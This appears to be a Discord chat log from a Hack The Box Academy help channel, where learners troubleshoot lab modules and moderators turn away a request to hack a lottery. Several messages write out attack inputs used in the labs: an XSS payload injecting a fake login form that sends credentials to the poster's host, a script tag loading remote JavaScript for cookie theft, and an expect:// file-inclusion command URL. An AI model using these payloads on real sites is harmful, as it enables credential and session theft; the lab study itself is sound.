yeah restarting the web page is refreshing it

bright ore
next bronze
fathom pendant
#

<@&861185840277487616> spam in all channels

fringe urchin
storm elk
#

Stop breaking rules Marcie

#

๐Ÿ˜š

oak girder
#

Thank you, I cleared the cookies and can enable them

#

Can Pwnbox save its own content? I remember that it can save some of the user's content.

vague sage
#

ive done my first ever hack with metasploit (on cracking HTB path)
im very proud

do i call myself a hacker now?

dim wolf
#

no we call you skid

trail sail
#

Does anyone know what the purpose of using dnscat2 was in the module on Pivoting, Tunneling, and Port Forwarding, specifically in the section on DNS Tunneling with Dnscat2? I was able to get the flag without creating a session with dnscat2

vague sage
#

wait is skid like the lowest
skid as in beginner/new/baby in this, type shit?

vague sage
#

ye i know

#

idk how to explain it though

fathom pendant
fathom pendant
#

Then complain when your copy/paste doesn't work without reading the error

vague sage
#

ye ye i mean
am i one level above from before

#

thats what i meant
or i still dont know how to explain it

#

OH
was i a skid from the very beginning or nah
those are noobs or something less

#

type

fathom pendant
vague sage
#

dang

native turtle
#

Hi there in AD skills assessment part 2 I'm on SQL01 with system level privileges, I would like to transfer some file in the parrot os attack box with smbserver, I think I had setup properly infact when I copy the files I received connection received with the relative hash but the file are not transfered in my parrot box, what can possibly be the problem?

fathom pendant
#

What academy module is this related to

slender river
#

d4rkcr4ck3r is a scammer guys take care of him

fathom pendant
vague sage
#

or better yet hack him

fathom pendant
#

Seems they aren't in the server (or mobile is being dumb)

fathom pendant
slender river
#

Yeah i know

#

I am just telling whoever is here thatโ€™s all

fathom pendant
#

We genuinely don't care

slender river
#

Thank you

fathom pendant
#

Idk what you expected out of "take care of him"

slender river
fathom pendant
#

No

vague sage
#

lmao

fathom pendant
#

Since it seems unrelated to HTB, and seems sus af I'm declining

#

Yeah you're trying to hack a fucking lottery system you nonce

#

It's not even a shitty web challenge

#

<@&861185840277487616> literally wants help to hack a lottery

fierce mason
fathom pendant
#

Fucking NO read the #rules you're literally asking do something illegal

next bronze
storm elk
#

๐Ÿ˜…

fathom pendant
#

Im good lmao

vague sage
#

yessirrr subscription

fierce mason
vague sage
#

if i cancel my subscription will it stay active until the end of the month?

fierce mason
fathom pendant
vague sage
#

oh good

fathom pendant
#

So whenever it would renew the next time

trail sail
#

Guys i get access to the flag in SOCKS5 Tunneling with Chisel module Pivoting, Tunneling, and Port Forwarding , but it says that the flag is wrong, could it be that someone altered the flag by mistake?
The question of the module is this one>
Using the concepts taught in this section, connect to the target and establish a SOCKS5 Tunnel that can be used to RDP into the domain controller (172.16.5.19, victor:pass@123). Submit the contents of C:\Users\victor\Documents\flag.txt as the answer.

vague sage
#

ye i got you thnk you

fathom pendant
trail sail
fathom pendant
#

It starts with H and ends with !

#

Make sure no additional spaces or anything like that

trail sail
#

Bro.... My mistake, i was entering the wrong flag

fathom pendant
#

You're likely looking in the wrong place then

#

Wait

#

Wrong section I'm looking at

#

It starts with T and ends with !

trail sail
#

Sorry, my bad lol

fathom pendant
#

I'm used to people getting stuck on the double pivot section of this module

trail sail
heavy carbon
#

Hello, in the final part of the Windows Fundamentals module there's a question asking to get the SID of a user you create manually. Aren't SIDs unique? I've tried everything and I always get it wrong

west canopy
#

SIDs are unique in that two users will not share the same SID. But just because each user has their own SID, does not necessarily mean the SID is impossible for us to find ๐Ÿ˜‰

heavy carbon
west canopy
#

can you show me?

heavy carbon
#

i got "S-1-5-21-2614195641-1726409526-3792725429-1004", copy pasted that but it's incorrect

west canopy
heavy carbon
#

wmic useraccount get name,sid in powershell

west canopy
#

can you show me a screenshot?

heavy carbon
west canopy
#

any chance you created a new user and then deleted them ?

heavy carbon
#

I think i did

west canopy
#

yep thats the problem . Respawn the target machine, make a new user named jim, and then run that command

heavy carbon
#

alright, tyvm!

fathom pendant
#

There actually is a science behind it

#

It's not wholly random

west canopy
#

yes i ended up using the extraSIDS attack yesterday to pwn a parent domain

#

feelsgoodman

heavy carbon
#

Congrats! I searched about exactly that, and a couple sites said it was all RNG. Interesting, thank you guys

fathom pendant
west canopy
#

and everytime we add a new user, the corresponding SID goes up incrementally

fathom pendant
#

Which is why it's extra important to trim dead SIDs

#

Proper user management

#

Oi <@&861185840277487616> they're back

oak girder
#

I would like to ask why I use xfreerdp /u:administrator /p:'xxxx' /v:10.129.xx.xx. After a few clicks, the entire target becomes invalid. I cannot ping directly and cannot operate anything. regenerate

fathom pendant
#

If it's consistent regardless of vpn region, message support

west canopy
sleek urchin
#

Doing Kerberos Attacks:Constrained Delegation from Linux and I got the following error

#

anyone has any idea why this could happen ?

cedar void
#

I am working on the phishing section of the CROSS scripting module and I don't know what I am doing wrong:
The link to the module and the question:

https://academy.hackthebox.com/module/103/section/984

"Try to find a working XSS payload for the Image URL form found at '/phishing' in the above server, and then use what you learned in this section to prepare a malicious URL that injects a malicious login form. Then visit '/phishing/send.php' to send the URL to the victim, and they will log into the malicious login form. If you did everything correctly, you should receive the victim's login credentials, which you can use to login to '/phishing/login.php' and obtain the flag. "

The payload I generated after sending this command ||(document.write('<h3>Please login to continue</h3><form action=http://10.10.15.204><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');)|| to the 'Online Image Viewer' imput of this link(http://10.129.127.112/phishing/index.php):

||http://10.129.127.112/phishing/index.php?url=document.write('<h3>Please+login+to+continue<%2Fh3><form+action%3Dhttp%3A%2F%2F10.10.15.204><input+type%3D"username"+name%3D"username"+placeholder%3D"Username"><input+type%3D"password"+name%3D"password"+placeholder%3D"Password"><input+type%3D"submit"+name%3D"submit"+value%3D"Login"><%2Fform>')%3B||

And then when I try to execute the above command (after creating the index.php file that contain my Machine IP address and issuing the command ||sudo php -S 0.0.0.0:8181|| on pwnbox) in the input box on this link(http://10.129.127.112/phishing/send.php) I get the 'Issue in sending URL!' error

silent sleet
#

for INTRODUCTION TO DIGITAL FORENSICS - Skills Assessment, we are supposed to run Velociraptor collections and download CSV and JSON files? How are we to analyze these, I see we have no python or other tools. Just open them up and manually sift through them?

west canopy
# sleek urchin

this might be a dumb question, but you have DC01 added to your hosts file right?

sleek urchin
west canopy
sleek urchin
west canopy
# sleek urchin

everything looks right.. is your impacket updated to the most recent version?

cedar void
spark spruce
sleek urchin
#

but i don't believe it's from impacket, since NetExec shows similar error

cedar void
# spark spruce 10.10.15.204:8181

I still get the same issue:

Isn't the port for both the php command and the port for the home IP address suppose to be the same?
|| sudo php -S 0.0.0.0:8081

document.write('<h3>Please login to continue</h3><form action=http://10.10.15.121:8081><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');||

west canopy
cloud urchin
#

the errors are related to authentication, looks like you have a ccache file with bad creds or creds that can't auth against the target

west canopy
viral slate
#

[HTTP ATTACKS - HTTP RESPONSE SPLITTING]
Hey guys!
Currently working on question of this section. My payload worked for user, but still struggling with admin.
Can I have a nudge?

sleek urchin
cedar void
cloud urchin
sleek urchin
cloud urchin
#

the ccache file is the creds in this case

#

you can DM me your commands to obtain the ccache i can verify for you if it looks right

manic spoke
#

Don't know if this is the right place to ask but, on the file inclusion skill assessment, I am REDOING it for practice, and it's not working (Positive I am doing it correctly as well). Is this a common issue? I don't want to release any spoilers though. Is there anyone I could DM perhaps?

muted kindle
#

The log poisoning tend to get bugged at times I had to reset the target

stark valve
#

yo anyone know the answer to this question " Using the skills acquired in this and previous sections, access the target host and search for the file named 'waldo.txt'. Submit the flag found within the file.'

#

its on INTRODUCTION TO WINDOWS COMMAND LINE

eager ledge
#

nmap scan on the target works. But I cannot SSH into it

#

I have been trying to do this exercise since like forever, but SSH never succeeds. I have tried changing VPN regions, but to no avail.

autumn pilot
#

The screenshot shows that you are actually in an SSH session

eager ledge
#

RIght! How could I miss that!

#

Thanks!

round moat
#

Enumerate the target Oracle database and submit the password hash of the user DBSNMP as the answer.
How to do this, I have used sqlplus scott/tiger@<ip>/XE as sysdba

#

how to solve this

viral slate
#

[HTTP ATTACKS - HTTP RESPONSE SPLITTING]
Hey guys!
Currently working on question of this section. My payload worked for user, but still struggling with admin.
Can I have a nudge?

short hare
#

@icy bramble heey are stuck at Child->Parent Trust from windows

You can DM me if still stuck

next bronze
# sleek urchin

did you guys figure it out? if not use only the FQDN for impacket and let it get the informaiton from the ticket itself

#

i.e. psexec.py DC01.INLANEFRIEGHT.LOCAL -k -no-pass

void hemlock
#

can I ping someone for the module: MODERN WEB EXPLOITATION TECHNIQUES

winged egret
#

hello guys in the linux privesc skills assessment, Note: There is a way to obtain a shell on the box instead of using the SSH credentials ... Can any1 point me in the right direction ? I tried to enumerate the web app for any vulnerabilities, bruteforced tomcat login on port 8080 and mysqlx doesnt seem to be anything of value

wooden summit
#

Hi there everyone!
I 'm doing the CPTS path. I 'm at footprinting-> DNS

I 've reached the last question on discovering sub domains using bruteforce. I have tried ALL lists within the SecLists folder, and none returns the x.x.x.203 IP for the network. What is my error?

carmine minnow
#

hi guys, i'm doing the CDSA path, i'm at windows event logs & finding devil. I'm trying to ask the two questions:"By examining the logs located in the "C:\Logs\DLLHijack" directory, determine the process responsible for executing a DLL hijacking attack. Enter the process name as your answer. Answer format: _.exe" and "By examining the logs located in the C:\Logs\Dump directory, determine the process that performed an LSASS dump. Enter the process name as your answer. Answer format: _.exe" but I can't find the answer can someone help me pls?

normal sand
#

What is this format? F9L8? I don't get what it means.

carmine minnow
tranquil axle
muted kindle
carmine minnow
#

you say I do it first from powershell compared to event viewer

muted kindle
carmine minnow
#

ok thank you

meager topaz
#

hey!

muted kindle
#

hi

limber surge
#

has the spawning been these slow lately?

vague sage
#

alright well
Once you gain access to 'user2', try to find a way to escalate your privileges to root, to get the flag in '/root/flag.txt'.

uhh privilege escalation/cracking into hackthebox

#

how am i supposed to escale root privileges

stable bone
#

can i get some help please

rustic sage
#

@stable bone sure

carmine minnow
#

that is, the one with lsass

muted kindle
royal cloud
#

Sorry, this is definetly not the right spot but I don't know what to do, I don't have the ability to message in any HTB Serious Discussion threads of Off-topic, I'm new here, is that normal??

#

@urban sage Sorry for the ping, figured this was a questions for mods, hope that's allowed! ๐Ÿ˜…

royal cloud
urban sage
#

Glad you figured it out. :D

vestal dust
#

i am doing CROSS-SITE SCRIPTING (XSS) path i am stuck a session hijacking modules
can anyone please help me
i am using this payload<script src=http://<ip>:3333/script.js></script>
where should i inject this ? i tried in profile url text box
no response
i have saved script.js and index.php and php server running
but i am not able to find cookie

normal sand
muted kindle
normal sand
next bronze
#

it's just a flag on whether complexity req is enforced

Flag that indicates whether the operating system MUST require that passwords meet complexity requirements. If this flag is set, it indicates that passwords MUST meet a specific minimum requirement.

muted kindle
#

it's weird

This value MUST be between 0 and 2^16
so 1 and 2 mean required?

next bronze
#

A value of 0 indicates that no password complexity requirements apply. Any other valid value indicates that password complexity requirements apply.

normal sand
#

Oh, found it. There's minimum requirements.

next bronze
#

the complexity is determined by the other values

normal sand
normal sand
next bronze
normal sand
#

Just found this when I continued reading.

#

Btw @next bronze if you don't mind me asking, how much recognition has CPTS got in SG?

next bronze
next bronze
normal sand
next bronze
#

I don't know. getting a company willing to sponsor is the hard part

normal sand
next bronze
#

you can check what roles are open and contact those companies

normal sand
next bronze
summer swallow
#

Hey, just completed the linux fundamentals module. Finally.... There were great exercises at the beginning and the middle sections of the module, which I enjoyed solving. But towards the end, there were more theoritical sections without any exercises..... Nevertheless, I studied them also dilligently and made notes. Those end sections demonstrated many methods, like how to configure different tools, which I didn't replicated on my VM as that would take a lot of time, doing that for each section. I think when I would encounter these tools, I would learn. Am I correct ? Should I replicate each method like how to mount NFS, how to configure firewall, How to use AppArmor, how to use Docker, etc..... Can I just have a theoritical knowledge of them now and when the time comes to use them, as I have already developed a familiarity, I would learn to use them ?

next bronze
#

or do both at the same time, internship and studying for certs

normal sand
normal sand
next bronze
#

that's still pretty good, I don't think pentesting internships exists

normal sand
summer swallow
next bronze
normal sand
next bronze
normal sand
next bronze
#

yeah the bonus points are easy to get

summer swallow
muted kindle
#

cool now it tells us servr load

normal sand
#

Think it's still ok to do the OSCP that quickly after CPTS?

next bronze
normal sand
normal sand
next bronze
normal sand
next bronze
normal sand
#

Just wasn't expecting that, but like you said, there might've been another easier attack path available.

summer swallow
# next bronze https://xre0us.io/posts/cpts-oscp-and-you/

Great blog for a beginner like me to understand how to take the maximum benefit of HTB Academy...... read the initial part, saved it to complete. BTW, Can u please elaborate on your avoiding to ask for help thing ? Like everywhere people say it is okay to use writeups. What should I do if I am stuck on a question for an hour or two or a day ? Please explain. Would love to know the thought process and implement it to my learning.

noble igloo
#

Thats right

next bronze
summer swallow
next bronze
void hemlock
next bronze
#

I haven't done that module

median gust
#

can someone help me with the enumeration with nmap boxes in academy

silk anchor
#

I have a question about the final challenge of the Shells and Payloads module.
||When I am trying to enumerate host 1 using Parrot foothold box, is my only option for accessing web based interfaces using the Links 2 browser or am I missing something?||

#

||I guess I can use the browser built into burp suite actually||

modern spear
#

Can anyone help me a little bit about the wrapper section in file inclusion module, i can retrieve the flag using data and input wrapper but the expect wrapper not work. I've already check the configuration of Apache have extension=expect. Then i'm directly use the command curl -s "http://ip:port/index.php?language=expect://id". Am i missing something?!

carmine minnow
silk anchor
# fathom pendant `firefox` in terminal

Thanks, I completed the flag using the burp suite chromium browser but this will be good to know for later.
Any idea why firefox doesnt show up when searching for applications? Or has it just been hidden on purpose to make you use your brain?

muted kindle
carmine minnow
#

thanks

#

However I managed to find the answer

muted kindle
carmine minnow
#

yesss

muted kindle
#

Would you like to know the powershell method

void hemlock
#

is someone free to help me for the modern web exploitation techniques?

carmine minnow
#

I did the simplest thing ever

muted kindle
carmine minnow
#

i know

muted kindle
#

Basically, i checked in event viewer the order of the fields and filter in powershell

carmine minnow
#

but in the meantime I succeeded

muted kindle
#

Ok great

carmine minnow
#

I'll keep it in mind, thank you very much

old oasis
#

I am stuck at the OTP section of the updated broken authentication - skill assessment. I tried with multiple digit codes up to 6 and it didnt work. I don't know how to figure out what the length of the OTP is either and there is nothing from what I can see in the code to tell otherwise. Any tips?

spiral pelican
#

Hey. Anyone did the C2 sliver module and can give me an hit for the first question of the Skill A.b part ? I tried Kerberoasting, seatbealt, etc but cant find any things ๐Ÿ˜ฆ

sacred laurel
#

Quick question: Iโ€™m planning to start Senior Web Penetration Tester path which requires 7500 cubes. If I get Platinum Monthly, will it make 36% discount for the modules?

fathom pendant
#

The discount is the # of cubes you get compared to outright purchasing the same amount

#

It's not a discount on the modules themselves

sacred laurel
#

Oh so if you get 1000 cubes directly itโ€™s 100 dollars but if you get monthly platinum itโ€™s 68 dollars so 36% discount?

fathom pendant
#

Bingo

sacred laurel
#

Iโ€™m disappointed lmao

fathom pendant
#

you're still getting cubes for cheaper

old oasis
#

Its an advanced cert after all

fathom pendant
#

it's not like you're getting no benefit from it

#

ยฏ_(ใƒ„)_/ยฏ

fathom pendant
sacred laurel
sacred laurel
old oasis
sacred laurel
fathom pendant
#

@vestal dust i don't accept unsolicited DMs

upbeat oak
#

Hey I'm on windows file transfer I made a python http server with python3 -m http.server 8080 and then attempt to iwr using http://IP:8080/upload_win.zip -OutFile upload_win.zip but I'm getting an unable to connect to the remote server error. Did I mess up with the http server or am I missing something else?

fathom pendant
#

did you switch ip for your tun0 ip?

upbeat oak
#

oh no I thought it was the target ip that could be the problem

fathom pendant
#

how would the target IP have the file to download ๐Ÿ˜‰

upbeat oak
#

Lol my bad thank you!

stark lark
#

Does this look familiar to anyone

#

Privs should be sufficient

fringe urchin
#

or what ever the correct command is

#

let me take a look since im speaking out from my head

next bronze
stark lark
fringe urchin
quiet gust
#

Can anyone recommend me I am totally new for which path I should choose

fathom pendant
#

information security fundamentals skill path

quiet gust
#

I started this but in setting up and organization there are some points in which there is very complex code is written and I am not able to understand single bit in this so what should I do

fathom pendant
#

take notes, google what you don't understand